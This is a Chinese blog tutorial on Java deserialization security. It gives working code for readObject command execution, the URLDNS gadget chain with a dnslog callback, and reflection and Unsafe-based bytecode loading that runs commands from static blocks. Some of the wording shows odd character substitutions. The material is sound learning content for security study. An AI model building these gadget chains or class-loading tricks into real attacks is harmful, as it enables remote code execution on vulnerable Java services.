前言
早知前路多艰苦,仙尊悔而我不悔。Java反序列化,免费一位,开始品鉴,学了这么久web,还没深入研究Java安全,人生一大罪过。诸君,请看。
序列化与反序列化
简单demo:- import java.io.FileInputStream;
- import java.io.FileOutputStream;
- import java.io.ObjectInputStream;
- import java.io.ObjectOutputStream;
- import java.io.Serializable;
- public class serialize implements Serializable{
- private String name;
- private int age;
- serialize(String name, int age){
- this.name = name;
- this.age = age;
- }
- public String getName() {
- return name;
- }
- public int getAge() {
- return age;
- }
- public void setName(String name) {
- this.name = name;
- }
- public void setAge(int age) {
- this.age = age;
- }
- public static void main(String[] args) throws Exception {
- // 序列化
- FileOutputStream fos = new FileOutputStream("serialize.bin");
- ObjectOutputStream oos = new ObjectOutputStream(fos);
- serialize serialize = new serialize("f12", 20);
- oos.writeObject(serialize);
- oos.close();
- // 反序列化
- FileInputStream fis = new FileInputStream("serialize.bin");
- ObjectInputStream ois = new ObjectInputStream(fis);
- serialize s = (serialize) ois.readObject();
- ois.close();
- System.out.print(s);
- }
- }
- // 输出
- serialize@3b07d329
大概的形式
- 入口类的readObejct直接调用危险方法
- 入口类参数包罗可控类,可控类里有危险方法
- 入口类参数包罗可控类,该类又调用其他含危险方法的类
- 构造函数/静态代码块等类加载时隐式实行
java反序列化导致实行系统下令
简单demo:- import java.io.FileInputStream;
- import java.io.FileOutputStream;
- import java.io.IOException;
- import java.io.ObjectInputStream;
- import java.io.ObjectOutputStream;
- import java.io.Serializable;
- public class serialize implements Serializable{
- private String name;
- private int age;
- serialize(String name, int age){
- this.name = name;
- this.age = age;
- }
- public String getName() {
- return name;
- }
- public int getAge() {
- return age;
- }
- public void setName(String name) {
- this.name = name;
- }
- public void setAge(int age) {
- this.age = age;
- }
- private void readObject(ObjectInputStream ois) throws ClassNotFoundException, IOException{
- ois.defaultReadObject();
- Runtime.getRuntime().exec("calc");
- }
- public static void main(String[] args) throws Exception {
- FileOutputStream fos = new FileOutputStream("serialize.bin");
- ObjectOutputStream oos = new ObjectOutputStream(fos);
- oos.writeObject(new serialize("f12", 20));
- oos.close();
- FileInputStream fis = new FileInputStream("serialize.bin");
- ObjectInputStream ois = new ObjectInputStream(fis);
- serialize s = (serialize) ois.readObject();
- System.out.println(s);
- }
- }
反序列化的思绪
- 都继续了Serializeable接口
- 入口类source(重写readObject、参数类型宽泛、jdk自带就更好、常见函数)
- 调用链(gadget chain)
- 实行类 sink(ssrf,rce....)
入口类
入口类一般是Map,Hashmap,HashTable这些集合类,由于集合类型宽泛(泛型),因此肯定继续了Serializeable接口,在Hashmap类中也重写了readObject方法:
为什么HashMap要自己实现writeObject和readObject方法
为什么要自己实现?如上文章所诉
调用链
所谓调用链就是一条完整的下令实行流程,在入口类中的readObject方法中,最好有一些常见的方法,如许不管我们传什么东西进去,他都可以调用这个方法,也加大了进一步探索的大概调用链中一般会使用很多重名函数,为了实现差别的结果
实行类
Java反序列化的目的就是为了实行下令,以是最终得找到一个可以实行下令的类,这是相对比较困难的
反序列化漏洞入门(URLDNS)分析
漏洞分析
开局先找重写了readObject的类,这里直接看HashMap:
这里s是我们可控,变化成key,进入了hash函数,继续跟进
这里调用了key的hashCode函数,也就是调用了我们可控类的hashCode函数,以是说同名函数在反序列化中是非常重要的,由于这里分析的是URLDNS链,我们看URL类中有无hashCode函数:
找到,这里有个判断,如果hashCode不等于-1,就直接返回,否则就进入handler.hashCode函数,在URL类中hashCode的值默认是-1,以是我们跟进:
这里重点在于getHostAddress,顾名思义获取host地址,如果我们传入我们vps的地址,是不是就会访问我们的vps了呢?这里使用dnslog来测试:- import java.io.FileInputStream;
- import java.io.FileOutputStream;
- import java.io.ObjectInputStream;
- import java.io.ObjectOutputStream;
- import java.io.Serializable;
- import java.net.MalformedURLException;
- import java.net.URL;
- import java.util.HashMap;
- public class URLDNS implements Serializable{
- public static void serialize(Object obj) throws Exception{
- FileOutputStream fos = new FileOutputStream("urldns.bin");
- ObjectOutputStream oos = new ObjectOutputStream(fos);
- oos.writeObject(obj);
- }
- public static void deserialize(String filename) throws Exception{
- FileInputStream fis = new FileInputStream(filename);
- ObjectInputStream ois = new ObjectInputStream(fis);
- ois.readObject();
- }
- public static void main(String[] args) throws Exception{
- HashMap<URL,Integer> hashmap = new HashMap<>();
- try {
- URL url = new URL("http://zanqlw.dnslog.cn/");
- hashmap.put(url,1);
- serialize(hashmap);
- deserialize("urldns.bin");
- } catch (MalformedURLException e) {
- e.printStackTrace();
- }
- }
- }
之后才注意到一个问题,我们就算不序列化和反序列化都能拿到请求,这是为什么?问题出如今hashmap.put这里,我们调试追踪一下:
发如今put的时候就触发了这里的getHostAddress,这时hashCode的值已经发生了改变,以是反序列化的时候根本就没触发DNS请求
那么怎么才能让我们反序列化的时候也触发DNS请求呢?hashCode的值肯定是要修改回-1的,如果要求只让我们反序列化的时候才触发DNS请求,put时的hashCode就不能是-1,以是怎么才能控制hashCode的值呢?这就必要用到反射的知识了
java反射
有反射就有正射
正射:通俗来讲就是我们常用的new,通过实例化类来获取一个对象
反射:跟正射反过来,通过实例化一个对象来获取它的类
举个栗子:- package f12;
- import java.io.FileOutputStream;
- import java.io.ObjectOutputStream;
- import java.lang.reflect.*;
- public class reflect {
- public static void Serialize(Object obj) throws Exception {
- FileOutputStream fos = new FileOutputStream("user.bin");
- ObjectOutputStream oos = new ObjectOutputStream(fos);
- oos.writeObject(obj);
- }
- public static void main(String[] args) throws Exception {
- // 正射
- user user = new user("f12", 20);
- Serialize(user);
- // 反射
- Class c = user.getClass();
- Constructor constructor = c.getConstructor(String.class, int.class);
- // 获取构造函数
- user newuser = (user) constructor.newInstance("F12", 21);
- System.out.println(newuser.getName());
- // 修改属性
- Field name = c.getDeclaredField("name");
- // 设置允许修改私有属性
- name.setAccessible(true);
- name.set(newuser, "F13");
- System.out.println(newuser.getName());
- }
- }
- // 输出
- F12
- F13
再战URLDNS
- import java.io.FileInputStream;
- import java.io.FileOutputStream;
- import java.io.ObjectInputStream;
- import java.io.ObjectOutputStream;
- import java.io.Serializable;
- import java.lang.reflect.Constructor;
- import java.lang.reflect.Field;
- import java.net.MalformedURLException;
- import java.net.URL;
- import java.util.HashMap;
- public class URLDNS implements Serializable{
- public static void serialize(Object obj) throws Exception{
- FileOutputStream fos = new FileOutputStream("urldns.bin");
- ObjectOutputStream oos = new ObjectOutputStream(fos);
- oos.writeObject(obj);
- }
- public static void deserialize(String filename) throws Exception{
- FileInputStream fis = new FileInputStream(filename);
- ObjectInputStream ois = new ObjectInputStream(fis);
- ois.readObject();
- }
- public static void main(String[] args) throws Exception{
- HashMap<URL,Integer> hashmap = new HashMap<>();
- try {
- URL url = new URL("http://vcx4cu.dnslog.cn/");
- Class u = url.getClass();
- Constructor constructor = u.getConstructor(String.class);
- URL newurl = (URL)constructor.newInstance("http://vcx4cu.dnslog.cn/");
- Field hashCode = u.getDeclaredField("hashCode");
- hashCode.setAccessible(true);
- hashCode.set(newurl, 1);
- hashmap.put(newurl, 1);
- hashCode.set(newurl, -1);
- serialize(hashmap);
- deserialize("urldns.bin");
- } catch (MalformedURLException e) {
- e.printStackTrace();
- }
- }
- }
JDK静态代理
一个demo:- package Proxy;
- public interface Interface {
- void rent();
- void pay();
- }
- package Proxy;
- public class Direct implements Interface{
- public void rent(){
- System.out.println("租房");
- }
- public void pay(){
- System.out.println("付款");
- }
- }
- package Proxy;
- public class Proxy implements Interface{
- public Interface user;
- Proxy(Interface user){
- this.user = user;
- }
- public void rent(){
- user.rent();
- System.out.println("中介帮你租房");
- }
- public void pay(){
- user.pay();
- System.out.println("中介帮你付款");
- }
- }
- package Proxy;
- public class Main {
- public static void main(String[] args) {
- Interface user = new Direct();
- Interface newuser = new Proxy(user);
- System.out.println("你自己:");
- user.rent();
- user.pay();
- System.out.println("找中介:");
- newuser.rent();
- newuser.pay();
- }
- }
静态代理的缺点就是当我们修改接口的化,Direct和Proxy类都得修改
JDK动态代理
- package Proxy;
- import java.lang.reflect.InvocationHandler;
- import java.lang.reflect.Method;
- public class UserInvokationHandler implements InvocationHandler {
- Interface user;
- UserInvokationHandler(Interface user){
- this.user = user;
- }
- @Override
- public Object invoke(Object invoke, Method method, Object[] args) throws Throwable{
- System.out.println("这里是动态代理,调用了方法:"+method.getName());
- method.invoke(user, args);
- return null;
- }
- }
- package Proxy;
- import java.lang.reflect.Proxy;
- public class Main {
- public static void main(String[] args) {
- Interface user = new Direct();
- // 动态代理
- UserInvokationHandler userInvokationHandler = new UserInvokationHandler(user);
- Interface newuser = (Interface) Proxy.newProxyInstance(user.getClass().getClassLoader(), user.getClass().getInterfaces(), userInvokationHandler);
- newuser.rent();
- newuser.pay();
- }
- }
动态代理与反序列化的关系
其实就是由于大概没有同名函数导致无法实行下令的问题,如果我们必要最终反序列化时实行B.danger(),我们的入口类时A(Object obj),但是A类里面并没有同名函数danger,只有A.abc => B.abc,obj为我们可控的类,但如果obj是个代理类,obj(Object obj2),而这个代理类里调用了danger,那么我们就可以用obj来代理B类,从而调用到B类的danger函数,即让obj2为B类
类的动态加载
起首先容两个代码块:
构造代码块和静态代码块:- {
- System.out.println("构造代码块");
- }
- static {
- System.out.println("静态代码块");
- }
- package ClassLoader;
- public class User {
- static {
- System.out.println("静态代码块");
- }
- {
- System.out.println("构造代码块");
- }
- User() {
- System.out.println("无参构造函数");
- }
- User(String key) {
- System.out.println("有参构造函数");
- }
- }
- package ClassLoader;
- public class Test {
- public static void main(String[] args) throws ClassNotFoundException {
- Class.forName("ClassLoader.User");
- }
- }
- // 输出
- 静态代码块
- package ClassLoader;
- public class Test {
- public static void main(String[] args) throws ClassNotFoundException {
- Class.forName("ClassLoader.User", false, ClassLoader.getSystemClassLoader());
- }
- }
- // 无输出
- package ClassLoader;
- public class Test {
- public static void main(String[] args) throws ClassNotFoundException {
- new User();
- }
- }
- // 输出
- 静态代码块
- 构造代码块
- 无参构造函数
双亲委派机制
所谓的双亲委派机制,指的就是:当一个类加载器收到了类加载的请求的时候,他不会直接去加载指定的类,而是把这个请求委托给自己的父加载器去加载。只有父加载器无法加载这个类的时候,才会由当前这个加载器来负责类的加载。
Java中提供的这四种类型的加载器,是有各自的职责的:
- Bootstrap ClassLoader ,主要负责加载Java核心类库,%JRE_HOME%\lib下的rt.jar、resources.jar、charsets.jar和class等。
- Extention ClassLoader,主要负责加载目录%JRE_HOME%\lib\ext目录下的jar包和class文件。
- Application ClassLoader ,主要负责加载当前应用的classpath下的全部类
- User ClassLoader , 用户自界说的类加载器,可加载指定路径的class文件
如许看来的话,用户自界说的类是不会让前两个加载器举行加载的,这里调试跟进一下加载过程
这里调用了loadclass,继续跟进
到这里,判断父加载器是否为空,不为空就调用父加载器举行加载
上面父加载器没找到,返回了APPClassLoader,这里进入URLClassLoader
然后进入defineClass
从结果上看加载进了User类的字节码,分析一下加载器的流程
ClassLoader->SecureClassloader->urlclassloaer->applicationclassloaer->loadclass->defineclass(加载字节码)
URLClassLoader任意类加载
这个类加载器里有个loadclass方法可以通过url来加载类,起首再本地起个web服务
- package ClassLoader;
- import java.net.MalformedURLException;
- import java.net.URL;
- import java.net.URLClassLoader;
- public class Test {
- public static void main(String[] args) throws ClassNotFoundException, MalformedURLException, InstantiationException, IllegalAccessException {
- URLClassLoader urlClassLoader = new URLClassLoader(new URL[]{new URL("http://127.0.0.1:9999/")});
- Class user = urlClassLoader.loadClass("ClassLoader.User");
- user.newInstance();
- }
- }
- // 输出
- 静态代码块
- 构造代码块
- 无参构造函数
ClassLoader.defineClass可以通过加载类的字节码来加载类,我们可以通过反射来获取到defineClass方法,加载我们自界说的类,来实行下令- package ClassLoader;
- import java.io.IOException;
- public class Eval {
- static {
- try {
- Runtime.getRuntime().exec("calc");
- } catch (IOException e) {
- throw new RuntimeException(e);
- }
- }
- public static void main(String[] args) {
- }
- }
- package ClassLoader;
- import java.io.IOException;
- import java.lang.reflect.InvocationTargetException;
- import java.lang.reflect.Method;
- import java.net.MalformedURLException;
- import java.net.URL;
- import java.net.URLClassLoader;
- import java.nio.file.Files;
- import java.nio.file.Paths;
- public class Test {
- public static void main(String[] args) throws ClassNotFoundException, IOException, InstantiationException, IllegalAccessException, NoSuchMethodException, InvocationTargetException {
- Method defindClass = ClassLoader.class.getDeclaredMethod("defineClass", String.class, byte[].class, int.class, int.class);
- defindClass.setAccessible(true);
- byte[] bytes = Files.readAllBytes(Paths.get("D:\\Java安全学习\\out\\production\\Java安全学习\\ClassLoader\\Eval.class"));
- ClassLoader cl = ClassLoader.getSystemClassLoader();
- Class eval = (Class) defindClass.invoke(cl, "ClassLoader.Eval", bytes,0, bytes.length );
- eval.newInstance();
- }
- }
Unsafe加载字节码
- package ClassLoader;
- import sun.misc.Unsafe;
- import java.io.IOException;
- import java.lang.reflect.Field;
- import java.lang.reflect.InvocationTargetException;
- import java.lang.reflect.Method;
- import java.net.MalformedURLException;
- import java.net.URL;
- import java.net.URLClassLoader;
- import java.nio.file.Files;
- import java.nio.file.Paths;
- public class Test {
- public static void main(String[] args) throws ClassNotFoundException, IOException, InstantiationException, IllegalAccessException, NoSuchMethodException, InvocationTargetException, NoSuchFieldException {
- byte[] bytes = Files.readAllBytes(Paths.get("D:\\Java安全学习\\out\\production\\Java安全学习\\ClassLoader\\Eval.class"));
- Field f = Unsafe.class.getDeclaredField("theUnsafe");
- f.setAccessible(true);
- Unsafe unsafe = (Unsafe) f.get(null);
- ClassLoader cl = ClassLoader.getSystemClassLoader();
- Class eval = unsafe.defineClass("ClassLoader.Eval",bytes,0, bytes.length, cl, null);
- eval.newInstance();
- }
- }
这里我们获取的是Unsafe的属性,而不是它的defineclass方法,由于它被native修饰,没法被反射调用
而它的属性theUnsafe其实就是Unsafe对象,以是获取这个属性,再调用defineclass来加载我们的自界说类
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。 |
